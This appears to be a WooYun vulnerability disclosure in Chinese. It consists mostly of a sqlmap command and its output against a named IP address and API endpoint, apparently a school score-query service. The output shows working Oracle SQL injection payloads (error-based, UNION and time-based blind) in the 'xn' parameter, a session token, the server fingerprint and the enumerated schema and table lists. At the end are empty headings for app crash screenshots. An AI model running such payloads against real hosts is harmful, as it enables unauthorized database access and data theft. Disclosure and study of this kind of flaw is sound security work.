WooYun.org

sqlmap测试爆库爆表情况：
D:\Python27\sqlmap>sqlmap.py -u http://218.94.124.62:8070/Api/Score/Query --data
="xn=&iPlanetDirectoryPro=U3luRHJlYW1fMjAxMTEzMDgwMjRfMjAxNDA2MjcyMTE2MTY4NjE4&p
ageIndex=1" --tables
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 21:30:07
[21:30:07] [WARNING] provided parameter 'iPlanetDirectoryPro' seems to be 'base6
4' encoded
[21:30:07] [INFO] resuming back-end DBMS 'oracle'
[21:30:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: xn
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)
Payload: xn=-7350' OR 7391=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)|
|CHR(109)||CHR(110)||CHR(108)||CHR(113)||(SELECT (CASE WHEN (7391=7391) THEN 1 E
LSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(121)||CHR(98)||CHR(113)||CHR(62))
) FROM DUAL) AND 'Drrg'='Drrg&iPlanetDirectoryPro=U3luRHJlYW1fMjAxMTEzMDgwMjRfMj
AxNDA2MjcyMTE2MTY4NjE4&pageIndex=1
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: xn=' UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)||CHR(109)||CHR(1
10)||CHR(108)||CHR(113)||CHR(67)||CHR(98)||CHR(90)||CHR(66)||CHR(87)||CHR(109)||
CHR(73)||CHR(99)||CHR(119)||CHR(74)||CHR(113)||CHR(120)||CHR(121)||CHR(98)||CHR(
113),NULL FROM DUAL-- &iPlanetDirectoryPro=U3luRHJlYW1fMjAxMTEzMDgwMjRfMjAxNDA2M
jcyMTE2MTY4NjE4&pageIndex=1
Type: AND/OR time-based blind
Title: Oracle OR time-based blind (heavy query)
Payload: xn=-2925' OR 5299=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,A
LL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'SYPm'='SYPm&iPlanetDirectoryPro=U3lu
RHJlYW1fMjAxMTEzMDgwMjRfMjAxNDA2MjcyMTE2MTY4NjE4&pageIndex=1
---
[21:30:07] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[21:30:07] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[21:30:07] [INFO] fetching database (schema) names
[21:30:07] [INFO] fetching tables for databases: 'APEX_030200, CTXSYS, EXFSYS, M
DSYS, OLAPSYS, SYS, SYSTEM, XDB'
[21:30:09] [WARNING] reflective value(s) found and filtering out
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+
Database: XDB
[1 table]
+--------------------------------+
| XDB$XIDX_IMP_T |
+--------------------------------+
Database: APEX_030200
[3 tables]
+--------------------------------+
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+--------------------------------+
Database: OLAPSYS
[2 tables]
+--------------------------------+
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
+--------------------------------+
Database: SYSTEM
[7 tables]
+--------------------------------+
| HELP |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: SYS
[33 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| AW$AWCREATE |
| AW$AWCREATE10G |
| AW$AWMD |
| AW$AWREPORT |
| AW$AWXML |
| AW$EXPRESS |
| HS$_PARALLEL_METADATA |
| HS_BULKLOAD_VIEW_OBJ |
| HS_PARTITION_COL_NAME |
| HS_PARTITION_COL_TYPE |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| KU$_DATAPUMP_MASTER_10_1 |
| KU$_DATAPUMP_MASTER_11_1 |
| KU$_DATAPUMP_MASTER_11_1_0_7 |
| KU$_DATAPUMP_MASTER_11_2 |
| KU$_LIST_FILTER_TEMP |
| KU$_LIST_FILTER_TEMP_2 |
| ODCI_PMO_ROWIDS$ |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OLAPTABLEVELS |
| OLAPTABLEVELTUPLES |
| PLAN_TABLE$ |
| PSTUBTBL |
| SAM_SPARSITY_ADVICE |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
| WRR$_REPLAY_CALL_FILTER |
+--------------------------------+
Database: MDSYS
[47 tables]
+--------------------------------+
| NTV2_XML_DATA |
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |
| SDO_COORD_OP_PATHS |
| SDO_COORD_REF_SYS |
| SDO_COORD_SYS |
| SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT |
| SDO_CS_CONTEXT_INFORMATION |
| SDO_CS_SRS |
| SDO_DATUMS |
| SDO_DATUMS_OLD_SNAPSHOT |
| SDO_ELLIPSOIDS |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT |
| SDO_GEOR_PLUGIN_REGISTRY |
| SDO_GEOR_XMLSCHEMA_TABLE |
| SDO_GR_MOSAIC_0 |
| SDO_GR_MOSAIC_1 |
| SDO_GR_MOSAIC_2 |
| SDO_GR_MOSAIC_3 |
| SDO_GR_RDT_1 |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_ST_TOLERANCE |
| SDO_TIN_PC_SEQ |
| SDO_TIN_PC_SYSDATA_TABLE |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_WFS_LOCAL_TXNS |
| SDO_WS_CONFERENCE |
| SDO_WS_CONFERENCE_PARTICIPANTS |
| SDO_WS_CONFERENCE_RESULTS |
| SDO_XML_SCHEMAS |
| SRSNAMESPACE_TABLE |
+--------------------------------+
Database: CTXSYS
[5 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
| DR$THS |
| DR$THS_PHRASE |
+--------------------------------+
[21:30:09] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\218.94.124.62'
[*] shutting down at 21:30:09
手机软件崩溃截图：
1.查看一卡通通知无响应：

2.在账号密码输入正确的情况下登不进去：